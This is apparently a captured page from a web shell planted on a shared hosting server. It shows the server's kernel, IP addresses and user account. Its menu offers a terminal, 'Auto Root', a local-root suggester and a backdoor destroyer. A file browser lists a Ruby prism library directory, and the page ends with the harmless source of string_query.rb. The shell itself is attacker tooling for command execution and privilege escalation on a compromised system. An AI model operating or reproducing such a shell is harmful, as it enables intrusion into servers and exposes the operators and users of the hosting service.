Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.216.32
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ruby /
prism /
Delete
Unzip
Name
Size
Permission
Date
Action
parse_result
[ DIR ]
drwxr-xr-x
2026-08-17 16:03
polyfill
[ DIR ]
drwxr-xr-x
2026-08-17 16:03
translation
[ DIR ]
drwxr-xr-x
2026-08-17 16:03
compiler.rb
23.76
KB
-rw-r--r--
2026-07-22 08:48
desugar_compiler.rb
9.89
KB
-rw-r--r--
2026-07-22 08:48
dispatcher.rb
111.71
KB
-rw-r--r--
2026-07-22 08:48
dsl.rb
56.77
KB
-rw-r--r--
2026-07-22 08:48
ffi.rb
19.42
KB
-rw-r--r--
2026-07-22 08:48
inspect_visitor.rb
124.61
KB
-rw-r--r--
2026-07-22 08:48
lex_compat.rb
32.44
KB
-rw-r--r--
2026-07-22 08:48
mutation_compiler.rb
21.1
KB
-rw-r--r--
2026-07-22 08:48
node.rb
588.89
KB
-rw-r--r--
2026-07-22 08:48
node_ext.rb
14.97
KB
-rw-r--r--
2026-07-22 08:48
pack.rb
5.88
KB
-rw-r--r--
2026-07-22 08:48
parse_result.rb
29.38
KB
-rw-r--r--
2026-07-22 08:48
pattern.rb
8.16
KB
-rw-r--r--
2026-07-22 08:48
reflection.rb
28.82
KB
-rw-r--r--
2026-07-22 08:48
relocation.rb
15.12
KB
-rw-r--r--
2026-07-22 08:48
serialize.rb
124.68
KB
-rw-r--r--
2026-07-22 08:48
string_query.rb
775
B
-rw-r--r--
2026-07-22 08:48
translation.rb
586
B
-rw-r--r--
2026-07-22 08:48
visitor.rb
24.12
KB
-rw-r--r--
2026-07-22 08:48
Save
Rename
# frozen_string_literal: true # :markup: markdown module Prism # Query methods that allow categorizing strings based on their context for # where they could be valid in a Ruby syntax tree. class StringQuery # The string that this query is wrapping. attr_reader :string # Initialize a new query with the given string. def initialize(string) @string = string end # Whether or not this string is a valid local variable name. def local? StringQuery.local?(string) end # Whether or not this string is a valid constant name. def constant? StringQuery.constant?(string) end # Whether or not this string is a valid method name. def method_name? StringQuery.method_name?(string) end end end